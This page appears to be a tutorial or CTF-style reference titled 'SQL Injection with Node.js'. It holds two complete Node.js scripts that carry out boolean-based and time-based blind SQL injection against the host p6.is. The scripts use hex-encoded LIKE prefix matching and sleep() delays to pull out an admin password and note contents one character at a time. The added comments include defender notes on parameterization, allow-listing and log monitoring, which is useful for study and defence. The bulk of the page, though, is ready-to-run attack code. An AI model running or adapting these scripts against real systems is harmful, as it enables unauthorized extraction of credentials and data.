SQL Injection with Node.js

   

Blind

// HTTP client used to send the probe requests (callback API).
// NOTE(review): the `request` package is deprecated upstream.
const request = require('request');
// Candidate characters tried at each position of the value being recovered.
const dict = '0123456789abcdefghijklmnopqrstuvwxyz={/}:.,_';

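/**
 * Build the `request` options for one probe of the boolean-based blind test.
 *
 * The `pw` query-string value opens with a single quote and ends with `#`, so
 * it is shaped to break out of a quoted SQL string and comment out the rest of
 * the statement (MySQL-style syntax: `||`, `&&`, `0x..` literals, `#`).
 * 0x61646d696e is the hex encoding of "admin". The guessed prefix is hex-encoded
 * and followed by 25 ("%"), which turns the LIKE into a prefix match.
 *
 * Defender note: this only works when the server concatenates `pw` into the
 * query text. Binding `pw` as a parameter of a prepared statement makes the
 * whole value inert data. In access logs the probes show up as many GET
 * requests to the same path whose `pw` values share a long common prefix.
 *
 * Declared with `const` so the binding is not an implicit global; a bare
 * assignment to an undeclared name throws in strict mode and in ES modules.
 *
 * @param {string} query - Prefix being tested against the stored value.
 * @returns {object} Options object in the shape the `request` client accepts.
 */
const option = (query) => {
  // Hex form of the guessed prefix, so it can be embedded as a 0x literal.
  const prefixHex = Buffer.from(query).toString('hex');

  return {
    headers: {
      Host: 'p6.is',
      'User-Agent': 'Mozilla/5.0',
      Accept: 'text/html',
      Cookie: 'PHPSESSID=posix',
    },
    qs: { pw: `' || id=0x61646d696e && pw like 0x${prefixHex}25 #` },
    method: 'GET',
    uri: 'http://p6.is/page.php',
  };
};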

/**
 * Extend a known prefix one character at a time, using the response body as a
 * true/false signal.
 *
 * For every character in `dict` a request is issued without waiting for the
 * previous one. A response containing the text "Hello admin" is treated as
 * confirmation of the guess, which is then printed and used as the new prefix.
 *
 * Defender note: the page content differing between a true and a false
 * condition is the only signal the script needs, so suppressing SQL error
 * messages does not help; the query itself has to be parameterized. Each
 * round is a burst of one request per `dict` character against one endpoint,
 * which rate limiting and log review can surface.
 *
 * @param {string} [data=''] - Prefix confirmed so far.
 * @returns {void}
 */
function exploit(data = '') {
  [...dict].forEach((candidate) => {
    const guess = data + candidate;

    request(option(guess), (err, res, body) => {
      // NOTE(review): `err` is never inspected; if the request fails, `body`
      // is undefined and the next line throws a TypeError.
      const matched = body.indexOf('Hello admin') !== -1;
      if (!matched) {
        return;
      }

      console.log(guess);
      exploit(guess);
    });
  });
}

// Start the search from the empty prefix.
exploit();

Time-based Blind

// Promise-returning HTTP client, so each probe can be awaited in turn.
// NOTE(review): `request-promise` wraps the deprecated `request` package.
const request = require('request-promise');
// Candidate characters tried at each position of the value being recovered.
const dict = '0123456789abcdefghijklmnopqrstuvwxyz:={}./_';
// Seconds passed to sleep() in the payload; also the latency threshold
// (delay * 1000 ms) above which a response is counted as a match.
const delay = 2;

/**
 * Build the `request-promise` options for one probe of the time-based test.
 *
 * The POST body sets `order` to a subquery that concatenates `title`, ":"
 * (0x3a) and `contents` from `note` for id 0x61646d696e ("admin" in hex),
 * compares it with LIKE against the hex-encoded guess plus 25 ("%"), and ANDs
 * the result with sleep(delay). The delay is therefore only incurred when the
 * prefix comparison is true.
 *
 * Defender note: presumably `order` is interpolated into an ORDER BY clause on
 * the server (not shown on this page). Identifiers and sort expressions cannot
 * be bound as statement parameters, so the usual fix is to map the request
 * value onto a fixed allow-list of column names. A database statement timeout
 * and alerting on `sleep(` in request parameters are useful secondary controls.
 *
 * @param {string} query - Prefix being tested against the stored value.
 * @returns {object} Options object in the shape the HTTP client accepts.
 */
const option = (query) => {
  // Hex form of the guessed prefix, so it can be embedded as a 0x literal.
  const prefixHex = Buffer.from(query).toString('hex');
  const subquery = `order=(select concat(title,0x3a,contents) from note where id=0x61646d696e)`;
  const condition = `like 0x${prefixHex}25 and sleep(${delay})`;

  return {
    headers: {
      Host: 'p6.is',
      'User-Agent': 'Mozilla/5.0',
      'Content-Type': 'application/x-www-form-urlencoded',
      Cookie: 'PHPSESSID=posix',
    },
    body: subquery + condition,
    method: 'POST',
    uri: 'http://p6.is/',
  };
};


/**
 * Extend a known prefix one character at a time, using response latency as a
 * true/false signal.
 *
 * Requests are sent sequentially. The wall-clock time of each one is compared
 * with `delay * 1000` ms; a slower response is treated as confirmation of the
 * guess, which is printed and used as the new prefix. If no character in
 * `dict` produces a slow response, the function resolves without a value.
 *
 * Defender note: nothing in the response body has to change for this to work,
 * so hiding output and errors is not a mitigation. The traffic is a long
 * series of requests to one endpoint in which the occasional response takes at
 * least `delay` seconds, which latency monitoring and slow-query logs can
 * surface.
 *
 * @param {string} [data=''] - Prefix confirmed so far.
 * @returns {Promise<void>} Settles when the search stops extending the prefix.
 */
async function exploit(data = '') {
  const thresholdMs = delay * 1000;

  for (const candidate of dict) {
    const guess = data + candidate;
    const startedAt = Date.now();

    // NOTE(review): a rejected request (network error, non-2xx status) is not
    // caught here and rejects the whole chain.
    await request(option(guess));

    const elapsedMs = Date.now() - startedAt;
    if (elapsedMs > thresholdMs) {
      console.log(guess);
      return exploit(guess);
    }
  }
}

// Start the search from the empty prefix. NOTE(review): the returned promise
// is not awaited or given a rejection handler, so a failed request surfaces as
// an unhandled rejection.
exploit();